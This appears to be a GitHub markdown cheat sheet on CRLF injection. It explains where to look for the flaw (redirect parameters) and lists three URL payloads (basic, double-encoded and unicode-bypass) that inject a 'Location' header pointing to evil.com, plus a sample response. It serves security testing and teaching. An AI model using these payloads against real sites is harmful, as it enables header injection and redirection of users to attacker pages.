Skip to content

Latest commit

 

History

History
35 lines (29 loc) · 1019 Bytes

CRLF Injection.md

File metadata and controls

35 lines (29 loc) · 1019 Bytes

CRLF Injection

Introduction

A CRLF Injection attack occurs when a user manages to submit a CRLF into an application. This is most commonly done by modifying an HTTP parameter or URL.

Where to find

It can be found anywhere, always check the request and response. Try to search for parameters that lead to redirects, you can see the response is (301, 302, 303, 307, 308).

How to exploit

  1. Basic payload
https://example.com/?lang=en%0D%0ALocation:%20https://evil.com/

The response is

HTTP/1.1 200 OK
Content-Type: text/html
Date: Mon, 09 May 2016 14:47:29 GMT
Set-Cookie: language=en
Location: https://evil.com/
  1. Double encode
https://example.com/?lang=en%250D%250ALocation:%20https://evil.com/
  1. Bypass unicode
https://example.com/?lang=en%E5%98%8A%E5%98%8DLocation:%20https://evil.com/

References